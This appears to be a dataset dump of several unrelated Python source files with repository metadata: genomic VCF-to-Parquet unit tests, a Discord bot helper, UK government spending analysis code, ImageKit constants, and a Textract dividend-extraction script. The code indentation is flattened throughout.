from biograph.vdb import vcf_to_parquet, anno_to_parquet
import biograph.vdb.parquet
import pyarrow as pa
import pandas as pd
class ParquetTestCases(unittest.TestCase):
def setUp(self):
# Make sure we test having multiple input chunks
biograph.vdb.parquet.ConverterBase.CHUNK_ROWS = 50
self.maxDiff = None
self.span_bases = 59
def get_parquet_rows(self, pq_path):
"Returns all records from the given parquet file as a list of dict objects"
f = pa.parquet.ParquetDataset(pq_path)
# Order within individual .parquet files is sorted by pos, but order is not
# guaranteed for a whole partitioned dataset, so sort here.
df = f.read().to_pandas().sort_values(["chrom", "pos"])
# Convert NAN to Python's 'None':
df = df.where(pd.notnull(df), None)
records = df.to_dict(orient='records')
# Check proper 'spans' value remove it.
for row in records:
self.assertLessEqual(row['pos'], row['varend'])
expected_spans = []
span = row['pos'] // self.span_bases
while span <= row['varend'] // self.span_bases:
expected_spans.append(span)
span += 1
self.assertListEqual(expected_spans, list(row['spans']), msg=repr(row))
del row['spans']
return records
# @unittest.skip(True)
def test_vcf(self):
with tempfile.TemporaryDirectory() as td:
out_fn = td
with gzip.open("golden/ftest/vdb/vdb002.vcf.gz", "rb") as fh:
header_lines = vcf_to_parquet("grch37", fh, out_fn, span_bases=self.span_bases)
self.assertEqual(len(header_lines), 140)
self.assertEqual(header_lines[0], '##fileformat=VCFv4.1')
actual = self.get_parquet_rows(out_fn)
self.assertEqual(len(actual), 2500)
first_row = actual[0]
self.assertDictEqual(first_row, {
'alt': 'A',
'chrom': '1',
'filt': 'lowq',
'info': [('NS', '1'), ('POP', ''), ('SVLEN', '-37'), ('SVTYPE', 'DEL')],
'pos': 10402,
'qual': 11.0,
'ref': 'ACCCTAACCCTAACCCTAACCCTAACCCTAACCCTAAC',
'reflen': 38,
'sample': [('GT', '0/1'),
('AC', '6,8'),
('AD', '7,1'),
('DC', '6,8'),
('DCC', '1,0'),
('DDC', '5,8'),
('DMO', '133,143'),
('DP', '8'),
('DS', '45,18'),
('DXO', '148,148'),
('EC', '6,8'),
('GQ', '1'),
('LAALTGC', '0.68'),
('LAALTSEQLEN', '125'),
('LALANCH', '0'),
('LARANCH', '0'),
('LAREFGC', '0.641975'),
('LAREFSPAN', '162'),
('LASCORE', '0'),
('MC', '6,8'),
('MO', '133,143'),
('MP', '0,0'),
('NR', '8,8'),
('NUMASM', '1'),
('OV', '0'),
('PAD', '0,0'),
('PDP', '0'),
('PG', '0|1'),
('PI', '7854514'),
('PL', '1,3,16'),
('RC', '0'),
('UC', '2,8'),
('UCC', '0,0'),
('UDC', '2,8'),
('UMO', '146,143'),
('US', '10,18'),
('UXO', '146,148'),
('XC', '6,8'),
('XO', '148,148')],
'varend': 10440,
'varid': None
})
# @unittest.skip(True)
def test_vcf_verbose_threads(self):
with tempfile.TemporaryDirectory() as td:
out_fn = td
with gzip.open("golden/ftest/vdb/vdb002.vcf.gz", "rb") as fh:
header_lines = vcf_to_parquet("grch37", fh, out_fn, nthreads=10, span_bases=self.span_bases, verbose=True)
self.assertEqual(len(header_lines), 140)
self.assertEqual(header_lines[0], '##fileformat=VCFv4.1')
actual = self.get_parquet_rows(out_fn)
self.assertEqual(len(actual), 2500)
first_row = actual[0]
self.assertDictEqual(first_row, {
'alt': 'A',
'chrom': '1',
'filt': 'lowq',
'info': [('NS', '1'), ('POP', ''), ('SVLEN', '-37'), ('SVTYPE', 'DEL')],
'pos': 10402,
'qual': 11.0,
'ref': 'ACCCTAACCCTAACCCTAACCCTAACCCTAACCCTAAC',
'reflen': 38,
'sample': [('GT', '0/1'),
('AC', '6,8'),
('AD', '7,1'),
('DC', '6,8'),
('DCC', '1,0'),
('DDC', '5,8'),
('DMO', '133,143'),
('DP', '8'),
('DS', '45,18'),
('DXO', '148,148'),
('EC', '6,8'),
('GQ', '1'),
('LAALTGC', '0.68'),
('LAALTSEQLEN', '125'),
('LALANCH', '0'),
('LARANCH', '0'),
('LAREFGC', '0.641975'),
('LAREFSPAN', '162'),
('LASCORE', '0'),
('MC', '6,8'),
('MO', '133,143'),
('MP', '0,0'),
('NR', '8,8'),
('NUMASM', '1'),
('OV', '0'),
('PAD', '0,0'),
('PDP', '0'),
('PG', '0|1'),
('PI', '7854514'),
('PL', '1,3,16'),
('RC', '0'),
('UC', '2,8'),
('UCC', '0,0'),
('UDC', '2,8'),
('UMO', '146,143'),
('US', '10,18'),
('UXO', '146,148'),
('XC', '6,8'),
('XO', '148,148')],
'varend': 10440,
'varid': None
})
# @unittest.skip(True)
def parse_anno(self, fmt, build, filename):
with tempfile.TemporaryDirectory() as td:
out_fn = td
with open(filename, "rb") as fh:
header_lines = anno_to_parquet(fmt, build, fh, out_fn, span_bases=self.span_bases)
records = self.get_parquet_rows(out_fn)
return header_lines, records
# @unittest.skip(True)
def test_vcf_anno(self):
header_lines, actual = self.parse_anno("vcf", "grch37", "golden/ftest/vdb/dbsnp-sample.vcf")
self.assertEqual(len(header_lines), 85)
self.assertEqual(header_lines[0], '##fileformat=VCFv4.0')
self.assertEqual(len(actual), 4162)
first_row = actual[0]
self.assertDictEqual(first_row,
{'reflen': 1, 'chrom': 'X', 'pos': 60001, 'varend': 60002,
'varid': 'rs1226858834', 'ref': 'T', 'alt': 'A', 'qual': None,
'filt': None,
'info': [('RS', '1226858834'), ('RSPOS', '60002'), ('dbSNPBuildID', '151'), ('SSR', '0'), ('SAO', '0'), ('VP', '0x050000000005000002000100'), ('WGT', '1'), ('VC', 'SNV'), ('ASP', ''), ('TOPMED', '0.99631275484199796,0.00368724515800203')],
'source': None, 'feature': None, 'score': None,
'frame': None, 'strand': None, 'attributes': None})
# @unittest.skip(True)
def test_gtf_anno(self): # GTF, also known as GFFv2
header_lines, actual = self.parse_anno("gtf", "grch37", "golden/ftest/vdb/gtf-37-sample.gtf")
self.assertEqual(len(header_lines), 5)
self.assertEqual(header_lines[0], '#!genome-build GRCh37.p13')
self.assertEqual(len(actual), 7)
first_gene_row = [row for row in actual if row['feature'] == 'gene'][0]
self.assertDictEqual(first_gene_row,
{'reflen': 2543, 'chrom': '1', 'pos': 11868, 'varend': 14411,
'varid': 'DDX11L1', 'ref': None, 'alt': None, 'qual': None,
'filt': None, 'info': None, 'source': 'pseudogene',
'feature': 'gene', 'score': None, 'frame': None, 'strand': '+',
'attributes': [('gene_id', 'ENSG00000223972'),
('gene_name', 'DDX11L1'),
('gene_source', 'ensembl_havana'),
('gene_biotype', 'pseudogene')]})
# @unittest.skip(True)
def test_gff_anno(self): # GFFv3
header_lines, actual = self.parse_anno("gff", "grch38", "golden/ftest/vdb/gff-38-sample.gff3")
self.assertEqual(len(header_lines), 200)
self.assertEqual(header_lines[0], '##gff-version 3')
self.assertEqual(len(actual), 64)
third_row = actual[2]
# Floats are only almost equal.
self.assertAlmostEqual(third_row['score'], 0.9990000128746033)
del third_row['score']
self.assertDictEqual(third_row, {
'alt': None,
'attributes': [('logic_name', 'eponine')],
'chrom': '1',
'feature': 'biological_region',
'filt': None,
'frame': None,
'info': None,
'pos': 10649,
'qual': None,
'ref': None,
'reflen': 7,
'source': '.',
'strand': '+',
'varend': 10656,
'varid': 'eponine'
})
other_rows = [a for a in actual if a['varid'] == 'DDX11L1']
self.assertEqual(len(other_rows), 1)
self.assertDictEqual(other_rows[0],
{
'alt': None,
'attributes': [('ID', 'gene:ENSG00000223972'),
('Name', 'DDX11L1'),
('biotype', 'transcribed_unprocessed_pseudogene'),
('description',
'DEAD/H-box helicase 11 like 1 (pseudogene) [Source:HGNC Symbol;Acc:HGNC:37102]'),
('gene_id', 'ENSG00000223972'),
('logic_name', 'havana_homo_sapiens'),
('version', '5')],
'chrom': '1',
'feature': 'pseudogene',
'filt': None,
'frame': None,
'info': None,
'pos': 11868,
'qual': None,
'ref': None,
'reflen': 2540,
'score': None,
'source': 'havana',
'strand': '+',
'varend': 14408,
'varid': 'DDX11L1'
})
if __name__ == '__main__':
unittest.main(verbosity=2)
| 45.00369 | 269 | 0.38816 | 1,066 | 12,196 | 4.333959 | 0.287993 | 0.040476 | 0.042857 | 0.024675 | 0.470563 | 0.398485 | 0.366667 | 0.331169 | 0.311039 | 0.301299 | 0 | 0.084639 | 0.455559 | 12,196 | 270 | 270 | 45.17037 | 0.611145 | 0.044605 | 0 | 0.583333 | 0 | 0.004167 | 0.180087 | 0.030655 | 0 | 0 | 0.00222 | 0 | 0.104167 | 1 | 0.033333 | false | 0 | 0.029167 | 0 | 0.075 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
375827b6a9a91f6310a50237f1737c67e7e7e925 | 2,430 | py | Python | bot/libraries/helper.py | Feyko/FICSIT-Fred | 94f049214d82d61862fe03405a2fd60a51e48177 | [
"MIT"
] | 5 | 2020-05-24T21:29:34.000Z | 2022-02-04T03:09:18.000Z | bot/libraries/helper.py | Feyko/FICSIT-Fred | 94f049214d82d61862fe03405a2fd60a51e48177 | [
"MIT"
] | 33 | 2021-08-02T16:41:48.000Z | 2022-03-31T21:22:10.000Z | bot/libraries/helper.py | Feyko/FICSIT-Fred | 94f049214d82d61862fe03405a2fd60a51e48177 | [
"MIT"
] | 3 | 2021-03-03T18:48:27.000Z | 2021-07-28T12:23:27.000Z | import re
import asyncio
from html.parser import HTMLParser
import aiohttp
from discord.ext import commands
import config
def is_bot_author(id: int):
return id == 227473074616795137
async def t3_only(ctx):
return is_bot_author(ctx.author.id) or permission_check(ctx, 4)
async def mod_only(ctx):
return is_bot_author(ctx.author.id) or permission_check(ctx, 6)
def permission_check(ctx, level: int):
perms = config.PermissionRoles.fetch_by_lvl(level)
main_guild = ctx.bot.get_guild(config.Misc.fetch("main_guild_id"))
if (main_guild_member := main_guild.get_member(ctx.author.id)) is None:
return False
has_roles = [role.id for role in (main_guild_member.roles)]
for role in perms:
if role.perm_lvl >= level:
if role.role_id in has_roles:
return True
else:
break
return False
class aTagParser(HTMLParser):
link = ''
view_text = ''
def clear_output(self):
self.link = ''
self.view_text = ''
def handle_starttag(self, tag, attrs):
if tag == 'a':
for attr in attrs:
if attr[0] == 'href':
self.link = f'({attr[1]})'
def handle_endtag(self, tag):
pass
def handle_data(self, data):
self.view_text = f'[{data}]'
def formatDesc(desc):
revisions = {
"<b>": "**",
"</b>": "**",
"<u>": "__",
"</u>": "__",
"<br>": "",
}
for old, new in revisions.items():
desc = desc.replace(old, new)
items = []
embeds = dict()
items.extend([i.groups() for i in re.finditer('(<a.+>.+</a>)', desc)]) # Finds all unhandled links
for i in items:
i = i[0] # regex returns a one-element tuple :/
parser = aTagParser()
parser.feed(i)
embeds.update({i: parser.view_text + parser.link})
for old, new in embeds.items():
desc = desc.replace(old, new)
desc = re.sub('#+ ', "", desc)
return desc
async def repository_query(query: str, bot):
bot.logger.info(f"SMR query of length {len(query)} requested")
async with await bot.web_session.post("https://api.ficsit.app/v2/query", json={"query": query}) as response:
bot.logger.info(f"SMR query returned with response {response.status}")
value = await response.json()
bot.logger.info("SMR response decoded")
return value
| 26.413043 | 112 | 0.597531 | 328 | 2,430 | 4.301829 | 0.393293 | 0.031892 | 0.023388 | 0.021262 | 0.145996 | 0.145996 | 0.077959 | 0.077959 | 0.077959 | 0.077959 | 0 | 0.014013 | 0.265844 | 2,430 | 91 | 113 | 26.703297 | 0.776906 | 0.025514 | 0 | 0.057971 | 0 | 0 | 0.095983 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.101449 | false | 0.014493 | 0.086957 | 0.014493 | 0.347826 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
37589b5d5e93593f28c9b4b9003c4e6bfe3a425e | 8,419 | py | Python | src/build_df_to_plot.py | crahal/centgovspend | 82ae1f63ec735da59cbe75dd47eda51d202d7555 | [
"MIT"
] | 4 | 2018-06-23T09:08:29.000Z | 2021-11-11T18:27:50.000Z | src/build_df_to_plot.py | crahal/centgovspend | 82ae1f63ec735da59cbe75dd47eda51d202d7555 | [
"MIT"
] | null | null | null | src/build_df_to_plot.py | crahal/centgovspend | 82ae1f63ec735da59cbe75dd47eda51d202d7555 | [
"MIT"
] | null | null | null | import glob
import ntpath
import pandas as pd
def build_timely_df(payments):
''' build the longitudinal dataset for figure 2b '''
timely_df = pd.DataFrame(columns=['Number of Payments',
'Value of Payments'])
for year in list(range(2009, 2018)):
timely_df.at[str(year) + 'Q1', 'Number of Payments'] = len(payments[
(payments['date'].dt.month <= 3) &
(payments['date'].dt.year == year)])/1000
timely_df.at[str(year) + 'Q1', 'Value of Payments'] = payments[
(payments['date'].dt.month <= 3) &
(payments['date'].dt.year == year)]['amount'].sum()/1000000000
timely_df.at[str(year) + 'Q2', 'Number of Payments'] = len(payments[
(3 < payments['date'].dt.month) &
(payments['date'].dt.month <= 6) &
(payments['date'].dt.year == year)])/1000
timely_df.at[str(year) + 'Q2', 'Value of Payments'] = payments[
(3 < payments['date'].dt.month) &
(payments['date'].dt.month <= 6) &
(payments['date'].dt.year == year)]['amount'].sum()/1000000000
timely_df.at[str(year) + 'Q3', 'Number of Payments'] = len(payments[
(6 < payments['date'].dt.month) &
(payments['date'].dt.month <= 9) &
(payments['date'].dt.year == year)])/1000
timely_df.at[str(year) + 'Q3', 'Value of Payments'] = payments[
(6 < payments['date'].dt.month) &
(payments['date'].dt.month <= 9) &
(payments['date'].dt.year == year)]['amount'].sum()/1000000000
timely_df.at[str(year) + 'Q4', 'Number of Payments'] = len(payments[
(9 < payments['date'].dt.month) &
(payments['date'].dt.month <= 12) &
(payments['date'].dt.year == year)])/1000
timely_df.at[str(year) + 'Q4', 'Value of Payments'] = payments[
(9 < payments['date'].dt.month) &
(payments['date'].dt.month <= 12) &
(payments['date'].dt.year == year)]['amount'].sum()/1000000000
timley_resetindex = timely_df.reset_index()
return timley_resetindex, timely_df
def build_pesa_df(pesa_path, merged_path):
''' build a df comparing centgovspend to pesa '''
pesa_table = pd.read_csv(pesa_path, index_col='Department')
list_of_files = []
for file_ in glob.glob(merged_path):
if ntpath.basename(file_)[:-4] in pesa_table.index:
df = pd.read_csv(file_, index_col=None, low_memory=False,
header=0, encoding='latin-1',
dtype={'transactionnumber': str,
'amount': float,
'supplier': str,
'date': str,
'expensearea': str,
'expensetype': str,
'file': str})
df['dept'] = ntpath.basename(file_)[:-4]
cols_to_consider = ['amount', 'date', 'dept', 'expensearea',
'expensetype', 'transactionnumber', 'supplier']
grouped = df.groupby(cols_to_consider)
index = [gp_keys[0] for gp_keys in grouped.groups.values()]
df_clean = df.reindex(index)
pesa_table.at[ntpath.basename(file_)[:-4],
'Raw_total_value'] = df_clean.amount.sum()
pesa_table.at[ntpath.basename(file_)[:-4],
'Raw_total_number'] = len(df_clean.amount)
df_clean['date_dt'] = pd.to_datetime(df_clean['date'],
errors='coerce')
df_temp = df_clean[(df_clean['date_dt'] > '2016-01-04') &
(df_clean['date_dt'] < '2017-03-31')]
pesa_table.at[ntpath.basename(file_)[:-4],
'Raw_20162017_value'] = df_temp['amount'].sum()
pesa_table.at[ntpath.basename(file_)[:-4],
'Raw_20162017_number'] = len(df_temp)
pesa_table.at[ntpath.basename(file_)[:-4],
'Raw_20162017_filecount'] = len(df_temp['file'].
unique())
df_temp = df_clean[(df_clean['date_dt'] > '2017-01-04') &
(df_clean['date_dt'] < '2018-03-31')]
pesa_table.at[ntpath.basename(file_)[:-4],
'Raw_20172018_value'] = df_temp['amount'].sum()
pesa_table.at[ntpath.basename(file_)[:-4],
'Raw_20172018_number'] = len(df_temp)
pesa_table.at[ntpath.basename(file_)[:-4],
'Raw_20172018_filecount'] = len(df_temp['file'].
unique())
tempdf = pd.merge(pd.DataFrame(df.groupby(['file']).size()).
rename({0: 'full_count'}, axis=1),
pd.DataFrame(df_clean[df_clean['date_dt'].
isnull()].
groupby(['file']).size()).
rename({0: 'nulldate_count'}, axis=1),
how='left', left_index=True, right_index=True)
tempdf['dept'] = ntpath.basename(file_)[:-4]
list_of_files.append(tempdf)
list_of_files = pd.concat(list_of_files, sort=False)
pesa_table['Raw_20162017_value'] = pesa_table['Raw_20162017_value']/1000000
pesa_table['Raw_20172018_value'] = pesa_table['Raw_20172018_value']/1000000
pesa_table = pesa_table.rename({'hmtreas': 'HMT',
'dfinttrade': 'DIT',
'foroff': 'FO',
'defra': 'DEFRA',
'dcultmedsport': 'DCMS',
'cabinetoffice': 'CO',
'dfintdev': 'DID',
'mojust': 'MOJ',
'homeoffice': 'HO',
'dbusenind': 'BEIS',
'dftransport': 'DT',
'mhclg': 'MHCLG',
'modef': 'MoD',
'hmrc': 'HMRC',
'dfeducation': 'DfE',
'dohealth': 'DoH',
'dworkpen': 'DWP'},
axis=0)
pesa_table['20172018Budget'] = pesa_table['20172018Budget']/1000
pesa_table['Raw_20172018_value'] = pesa_table['Raw_20172018_value']/1000
pesa_table['Ratio_20172018'] = pd.to_numeric(pesa_table['Raw_20172018_value']/pesa_table['20172018Budget'])
return pesa_table, list_of_files
def trillions(x, pos):
return '£%1.1ftrn' % (x)
def billions(x, pos):
return '£%1.0fbn' % (x)
def thousands(x, pos):
return '%1.0fk' % (x)
def clean_occupations(x):
x = x.replace('.', '')
x = x.replace(',', '')
return x.title()
def clean_officer_names(x):
try:
if len(x.split(' ')) >= 1:
return x.split(' ')[1]
except IndexError:
pass
def clean_countries(x):
x = x.lower().replace('england', 'united kingdom')
x = x.lower().replace('scotland', 'united kingdom')
x = x.lower().replace('wales', 'united kingdom')
x = x.lower().replace('northern ireland', 'united kingdom')
x = x.lower().replace('britain', 'united kingdom')
x = x.lower().replace('.', '')
x = x.lower().replace(',', '')
if x.lower()[0:2] == 'gb':
x = 'united kingdom'
return x.title()
def clean_nationalities(x):
x = x.lower().replace('english', 'british')
x = x.lower().replace('scottish', 'british')
x = x.lower().replace('welsh', 'british')
x = x.lower().replace('northern irish', 'british')
x = x.lower().replace('united kingdom', 'british')
x = x.lower().replace('.', '')
x = x.lower().replace(',', '')
if x.lower()[0:2] == 'uk':
x = 'british'
return x.title()
| 47.835227 | 112 | 0.473215 | 868 | 8,419 | 4.420507 | 0.228111 | 0.043784 | 0.080271 | 0.069325 | 0.545478 | 0.434715 | 0.365911 | 0.35705 | 0.338546 | 0.314829 | 0 | 0.058424 | 0.369759 | 8,419 | 175 | 113 | 48.108571 | 0.664342 | 0.010334 | 0 | 0.251613 | 0 | 0 | 0.168734 | 0.005403 | 0 | 0 | 0 | 0 | 0 | 1 | 0.058065 | false | 0.006452 | 0.019355 | 0.019355 | 0.135484 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
375baab0f35211b2da08b1e7f0a7cfd2b213edad | 361 | py | Python | imagekitio/constants/files.py | samims/imagekit-python | 4bc8041e22c6333710645ddc95446c9c348eea5b | [
"MIT"
] | 1 | 2020-01-20T16:56:32.000Z | 2020-01-20T16:56:32.000Z | imagekitio/constants/files.py | samims/imagekit-python | 4bc8041e22c6333710645ddc95446c9c348eea5b | [
"MIT"
] | null | null | null | imagekitio/constants/files.py | samims/imagekit-python | 4bc8041e22c6333710645ddc95446c9c348eea5b | [
"MIT"
] | null | null | null | VALID_FILE_OPTIONS = [
"path",
"fileType",
"tags",
"includeFolder",
"name",
"limit",
"skip",
]
VALID_FILE_DETAIL_OPTIONS = ["fileID"]
VALID_UPLOAD_OPTIONS = [
"file",
"file_name",
"use_unique_file_name",
"tags",
"folder",
"is_private_file",
"custom_coordinates",
"response_fields",
"metadata"
]
| 15.041667 | 38 | 0.581717 | 35 | 361 | 5.571429 | 0.657143 | 0.092308 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.257618 | 361 | 23 | 39 | 15.695652 | 0.727612 | 0 | 0 | 0.095238 | 0 | 0 | 0.407202 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
375c80d3b986b5561b93d213ff84e9281e6dd2b6 | 9,972 | py | Python | src/getContents.py | ajayz09/amazon-textract | bea3028596d6b60482017e12b80cbb0d2b91d3a5 | [
"Apache-2.0"
] | 1 | 2021-01-03T01:23:52.000Z | 2021-01-03T01:23:52.000Z | src/getContents.py | ajayz09/amazon-textract | bea3028596d6b60482017e12b80cbb0d2b91d3a5 | [
"Apache-2.0"
] | null | null | null | src/getContents.py | ajayz09/amazon-textract | bea3028596d6b60482017e12b80cbb0d2b91d3a5 | [
"Apache-2.0"
] | null | null | null | import os
import time
import csv
import pandas as pd
def formatdate(paymentDate):
months = dict(january='01', february='02', march='03', april='04', may='05', june='06', july='07', august='08', september='09', october='10', november='11', december='12')
paymentDateList = paymentDate.split()
if (len(paymentDateList) != 1):
day = paymentDateList[0]
month = paymentDateList [1].lower()
year = paymentDateList[2]
month = months[month]
date = year+'-'+month+'-'+day
return date
elif (len(paymentDateList) == 1):
paymentDateList = paymentDate.split('/')
day = paymentDateList[0]
month = paymentDateList [1]
year = paymentDateList[2]
date = year+'-'+month+'-'+day
return date
def getFrankedAmount(df):
DICTIONARY_FA = "../dictionary/franked-amount"
temp = open(DICTIONARY_FA,'r').read().split('\n')
try:
for i in temp:
frankedAmountRow = df[df['Key'].str.match(i)]
if not frankedAmountRow.empty:
frankedAmount = frankedAmountRow.Value.values[0]
frankedAmount = frankedAmount.replace("A$","")
frankedAmount = frankedAmount.replace("$","")
print('Franked Amount - ',frankedAmount)
return frankedAmount
except:
return False
def getUnfrankedAmount(df):
DICTIONARY_UFA = "../dictionary/unfranked-amount"
temp = open(DICTIONARY_UFA,'r').read().split('\n')
try:
for i in temp:
unfrankedAmountRow = df[df['Key'].str.match(i)]
if not unfrankedAmountRow.empty:
unfrankedAmount = unfrankedAmountRow.Value.values[0]
unfrankedAmount = unfrankedAmount.replace("A$","")
unfrankedAmount = unfrankedAmount.replace("$","")
if unfrankedAmount == 'Nil':
unfrankedAmount = 0.00
print('Unfranked Amount - ',unfrankedAmount)
return True
except:
return False
def getParticipatingShares(df):
DICTIONARY_PS = "../dictionary/participating-shares"
temp = open(DICTIONARY_PS,'r').read().split('\n')
try:
for i in temp:
participatingSharesRow = df[df['Key'].str.match(i)]
if not participatingSharesRow.empty:
participatingShares = participatingSharesRow.Value.values[0]
participatingShares = participatingShares.replace(",","")
print('Participating Shares - ',participatingShares)
return True
except:
return False
def getTotalPayment(df):
DICTIONARY_TP = "../dictionary/total-payment"
temp = open(DICTIONARY_TP,'r').read().split('\n')
try:
for i in temp:
totalPaymentRow = df[df['Key'].str.match(i)]
if not totalPaymentRow.empty:
totalPayment = totalPaymentRow.Value.values[0]
totalPayment = totalPayment.replace("A$","")
totalPayment = totalPayment.replace("$","")
print('Total Payment - ',totalPayment)
return True
except:
return False
def getFrankingCredit(df):
DICTIONARY_FC = "../dictionary/franking-credits"
temp = open(DICTIONARY_FC,'r').read().split('\n')
try:
for i in temp:
frankedCreditRow = df[df['Key'].str.match(i)]
if not frankedCreditRow.empty:
frankedCredit = frankedCreditRow.Value.values[0]
frankedCredit = frankedCredit.replace("A$","")
frankedCredit = frankedCredit.replace("$","")
print('Franking Credit - ',frankedCredit)
return True
except:
return False
def getPaymentDate(df):
DICTIONARY_PD = "../dictionary/payment-date"
temp = open(DICTIONARY_PD,'r').read().split('\n')
try:
for i in temp:
paymentDateRow = df[df['Key'].str.match(i)]
if not paymentDateRow.empty:
paymentDate = paymentDateRow.Value.values[0]
if not paymentDate:
return False
date = formatdate(paymentDate)
print('Payment Date - ',date)
return True
except:
return False
def getFrankingCreditsFromTable(df):
DICTIONARY_FC = "../dictionary/franking-credits"
temp = open(DICTIONARY_FC,'r').read().split('\n')
try:
for i in temp:
# print("df.columns ",df.columns)
if i in df.columns:
frankedCredit = df[i].iloc[0]
frankedCredit = frankedCredit.replace("A$","")
frankedCredit = frankedCredit.replace("$","")
print('Franking Credit - ',frankedCredit)
return True
except:
return False
def getFrankedAmountFromTable(df):
DICTIONARY_FA = "../dictionary/franked-amount"
temp = open(DICTIONARY_FA,'r').read().split('\n')
try:
for i in temp:
if i in df.columns:
frankedAmount = df[i].iloc[0]
frankedAmount = frankedAmount.replace("A$","")
frankedAmount = frankedAmount.replace("$","")
print('Franked Amount - ',frankedAmount)
return frankedAmount
except:
return False
def getUnfrankedAmountFromTable(df):
DICTIONARY_UFA = "../dictionary/unfranked-amount"
temp = open(DICTIONARY_UFA,'r').read().split('\n')
try:
for i in temp:
if i in df.columns:
unfrankedAmount = df[i].iloc[0]
unfrankedAmount = unfrankedAmount.replace("A$","")
unfrankedAmount = unfrankedAmount.replace("$","")
if unfrankedAmount == 'Nil':
unfrankedAmount = 0.00
print('Unfranked Amount - ',unfrankedAmount)
return True
except:
return False
def getTotalPaymentFromTable(df):
DICTIONARY_TP = "../dictionary/total-payment"
temp = open(DICTIONARY_TP,'r').read().split('\n')
try:
for i in temp:
if i in df.columns:
totalPayment = df[i].iloc[0]
totalPayment = totalPayment.replace("A$","")
totalPayment = totalPayment.replace("$","")
print('Total Payment - ',totalPayment)
return True
except:
return False
def getParticipatingSharesFromTable(df):
DICTIONARY_PS = "../dictionary/participating-shares"
temp = open(DICTIONARY_PS,'r').read().split('\n')
try:
for i in temp:
if i in df.columns:
participatingShares = df[i].iloc[0]
participatingShares = participatingShares.replace("A$","")
participatingShares = participatingShares.replace("$","")
print('Participating Shares - ',participatingShares)
return True
except:
return False
# def getPaymentDate(textDocument):
# for line in open(textDocument):
# # for k in keywords:
# if 'Payment Date' in line:
# print(line)
def getPaymentDateFromText(textDocument):
DICTIONARY_PD = "../dictionary/payment-date"
temp = open(DICTIONARY_PD,'r').read().split('\n')
flag = False
for line in open(textDocument):
if flag == True:
date = formatdate(line)
if date:
print ('Payment Date - ',date)
return True
for k in temp:
if k in line:
flag = True
return False
DOCUMENTS_PATH = "../results"
dividendDF = pd.DataFrame(columns=['Number of Securities','Franked Amount','Unfranked Amount','Total Payment','Franking Credit'],index = None)
gotFrankedAmount = False
gotUnfrankedAmount = False
gotParticipatingShares = False
gotTotalPayment = False
gotFrankingCredits = False
gotPaymentDate = False
for documents in os.listdir(DOCUMENTS_PATH):
print("\nContents of document - ", documents)
print("----------------------------")
FORM_DATA_PATH = DOCUMENTS_PATH + '/' + documents + '/Forms/'
for forms in os.listdir(FORM_DATA_PATH):
FORM_DATA = FORM_DATA_PATH + forms
data = pd.read_csv(FORM_DATA)
gotFrankedAmount = getFrankedAmount(data)
gotUnfrankedAmount = getUnfrankedAmount(data)
gotParticipatingShares = getParticipatingShares(data)
gotTotalPayment = getTotalPayment(data)
gotFrankingCredits = getFrankingCredit(data)
gotPaymentDate = getPaymentDate(data)
TABLE_DATA_PATH = DOCUMENTS_PATH + '/' + documents + '/Tables/'
for tables in os.listdir(TABLE_DATA_PATH):
TABLE_DATA = TABLE_DATA_PATH + tables
dataTable = pd.read_csv(TABLE_DATA,skiprows=1,index_col=False)
if not gotFrankingCredits:
gotFrankingCredits = getFrankingCreditsFromTable(dataTable)
if not gotFrankedAmount:
gotFrankedAmount = getFrankedAmountFromTable(dataTable)
if not gotUnfrankedAmount:
gotUnfrankedAmount = getUnfrankedAmountFromTable(dataTable)
if not gotTotalPayment:
gotTotalPayment = getTotalPaymentFromTable(dataTable)
if not gotParticipatingShares:
gotParticipatingShares = getParticipatingSharesFromTable(dataTable)
TEXT_DATA_PATH = DOCUMENTS_PATH + '/' + documents + '/Text/'
for text in os.listdir(TEXT_DATA_PATH):
TEXT_DATA = TEXT_DATA_PATH + text
if not gotPaymentDate:
gotPaymentDate = getPaymentDateFromText(TEXT_DATA)
if gotFrankedAmount:
if not gotFrankingCredits:
frankingCredit = (float(gotFrankedAmount) / 0.7) - float(gotFrankedAmount)
print('Franking Credit - ',(round(frankingCredit, 2))) | 38.206897 | 175 | 0.586843 | 920 | 9,972 | 6.3 | 0.166304 | 0.008282 | 0.037267 | 0.022774 | 0.504658 | 0.478088 | 0.441511 | 0.43668 | 0.414941 | 0.412698 | 0 | 0.007577 | 0.298536 | 9,972 | 261 | 176 | 38.206897 | 0.821015 | 0.018853 | 0 | 0.556034 | 0 | 0 | 0.088575 | 0.038662 | 0 | 0 | 0 | 0 | 0 | 1 | 0.056034 | false | 0 | 0.017241 | 0 | 0.189655 | 0.064655 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
